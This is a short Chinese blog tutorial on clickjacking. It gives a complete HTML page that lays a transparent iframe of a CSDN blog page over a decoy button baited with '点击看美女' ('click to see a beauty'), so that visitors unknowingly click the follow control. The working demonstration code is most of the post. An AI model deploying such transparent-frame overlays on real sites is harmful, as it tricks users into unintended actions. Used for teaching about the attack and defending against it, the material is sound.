点击劫持是一种视觉欺骗的攻击手段。攻击者将需要攻击的网站通过 iframe 嵌套的方式嵌入自己的网页中,并将 iframe 设置为透明,在页面中透出一个按钮诱导用户点击。
这里来演示一下 首先这是我的csdn博客地址(当然这里不存在点击劫持)
然后如果我想利用点击劫持来让用户来关注我 这里就要用到iframe标签嵌套 然后设置一个按钮
还有诱骗他人点击的内容这些可以自行写 这里简单用“点击看美女代替”
<!DOCTYPE HTML>
<html>
<meta http-equiv="Content-Type" content="text/html; charset="utf-8" />
<head>
<title>点击劫持</title>
<style>
html,body,iframe{
display: block;
height: 100%;
width: 100%;
margin: 0;
padding: 0;
border:none;
}
iframe{
opacity:0;
filter:alpha(opacity=0);
position:absolute;
z-index:2;
}
button{
position:absolute;
top: 340px;
left: 290px;
z-index: 1;
width: 72px;
height: 26px;
}
</style>
</head>
<body>
点击看美女
<button>查看详情</button>
<iframe src="https://blog.csdn.net/2301_81368488/article/details/136040257"></iframe>
</body>
</html>
这里的 opacity就是透明度 如何没设置透明度或者透明度较高就是这个样子
将透明度拉慢就是如下
然后通过调整按钮的位置将按钮放在我关注的地方即可
可以看见只要透明度拉低对方一点击就能直接关注我 由于csdn校验比较严格所以点击直接就跳转到登录页面
当然还是很多薄弱的地方 这里只是举例
感谢各位大佬观看 可以加qq联系3661629617